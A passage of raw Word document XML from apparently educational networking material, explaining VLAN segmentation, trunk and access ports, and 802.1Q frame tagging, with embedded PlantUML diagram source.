              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">How to </w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>read this diagram</w:t>
            </w:r>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F307F3" w14:textId="2B8E8BB3" w:rsidR="00382FFA" w:rsidRPr="002C60B7" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="230"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Physical </w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>layer</w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>: Single switch hardware supporting multiple VLANs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2184E274" w14:textId="30D07003" w:rsidR="00382FFA" w:rsidRPr="002C60B7" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="230"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Logical </w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>segmentation</w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>: Different departments isolated in separate VLANs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01F03936" w14:textId="0E56501F" w:rsidR="00382FFA" w:rsidRPr="002C60B7" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="230"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Access </w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ports</w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>: Connect end devices to specific VLANs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77CF8183" w14:textId="7D0F1B09" w:rsidR="00382FFA" w:rsidRPr="002C60B7" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="230"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Trunk </w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>port</w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>: Carries traffic for multiple VLANs using 802.1Q tagging</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EA887EF" w14:textId="5AE2BE8B" w:rsidR="00382FFA" w:rsidRPr="002C60B7" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="230"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Inter-VLAN </w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>routing</w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>: Router enables communication between VLANs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7659CAD0" w14:textId="3F017250" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Real-</w:t>
            </w:r>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>world application</w:t>
            </w:r>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DC69422" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="002C60B7" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="229"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Sales team (VLAN 10) cannot directly access Engineering resources (VLAN 20)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="762DBEE1" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="002C60B7" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="229"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>All inter-departmental communication must go through the router</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5400B88B" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="002C60B7" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="229"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Network management traffic (VLAN 99) is isolated from user traffic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C90F109" w14:textId="43BB8F23" w:rsidR="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="229"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="002C60B7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Each VLAN has its own IP subnet for proper routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F7BA7D5" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77EC32A8" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:t>VLAN Trunking Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6047A6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A98571" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:r w:rsidRPr="0052487A">
        <w:t xml:space="preserve">VLAN Trunking is a method that allows a single physical link between network switches to </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>carry traffic for multiple VLANs simultaneously</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t xml:space="preserve">. Trunking uses </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>frame tagging protocols</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t xml:space="preserve"> (primarily IEEE 802.1Q) to identify which VLAN each frame belongs to, enabling efficient utilization of network links and simplified network topology management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D712D99" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:t>How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF0FA3" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:r w:rsidRPr="0052487A">
        <w:t>VLAN trunking operates through frame tagging and VLAN identification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2337BDE1" w14:textId="26F080BF" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Trunking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rocess:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7C162A" w14:textId="3256881D" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Frame </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reception</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Switch receives frame on access port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6B104B" w14:textId="5359C34A" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>identification</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Frame associated with port's VLAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395CC837" w14:textId="64562C91" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tag </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>insertion</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: 802.1Q tag added with VLAN ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3779BDF2" w14:textId="75A06FF1" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Trunk </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transmission</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Tagged frame sent over trunk link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5478D031" w14:textId="034E73ED" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tag </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Receiving switch reads VLAN tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D7DB7E" w14:textId="7171A15C" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tag </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>removal</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Tag removed before forwarding to access port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290C35A2" w14:textId="41FDFCEA" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Frame delivered to correct VLAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54725EEB" w14:textId="2CAC7F58" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">802.1Q </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>frame format</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B039C2" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="005248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52487A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Original Ethernet Frame:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA49FE3" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="005248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52487A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>| Dest MAC | Src MAC | EtherType | Data | FCS |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F96D48E" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="005248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486526A0" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="005248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52487A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>802.1Q Tagged Frame:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B879633" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="005248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52487A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>| Dest MAC | Src MAC | 802.1Q Tag | EtherType | Data | FCS |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A06B5" w14:textId="7B1381F1" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">802.1Q </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">tag structure </w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(4 bytes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F00220C" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TPID (Tag Protocol Identifier)</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: 2 bytes (0x8100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73270D75" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCI (Tag Control Information)</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: 2 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C3F4F" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PCP (Priority Code Point)</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: 3 bits (QoS priority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5592A3" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEI (Drop Eligible Indicator)</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: 1 bit (congestion management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB6642" w14:textId="7C455D86" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VID (VLAN Identifier)</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: 12 bits (VLAN ID 1-4094)to different V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2"/>
        <w:gridCol w:w="454"/>
      </w:tblGrid>
      <w:tr w:rsidR="0052487A" w14:paraId="50445A28" w14:textId="77777777" w:rsidTr="0052487A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17042" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EBBD08A" w14:textId="64B4FA0F" w:rsidR="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5673E479" wp14:editId="736E2CAE">
                  <wp:extent cx="10972800" cy="9105265"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:docPr id="101083760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0" cy="9105265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D70B43E" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17BFAFED" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title VLAN Trunking with 802.1Q Tagging</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FCCE540" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62838D08" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "Switch A" as switch_a {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BC6625E" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "VLAN 10\nSales" as vlan10_a #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B890A8" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "VLAN 20\nEngineering" as vlan20_a #lightyellow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27925513" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
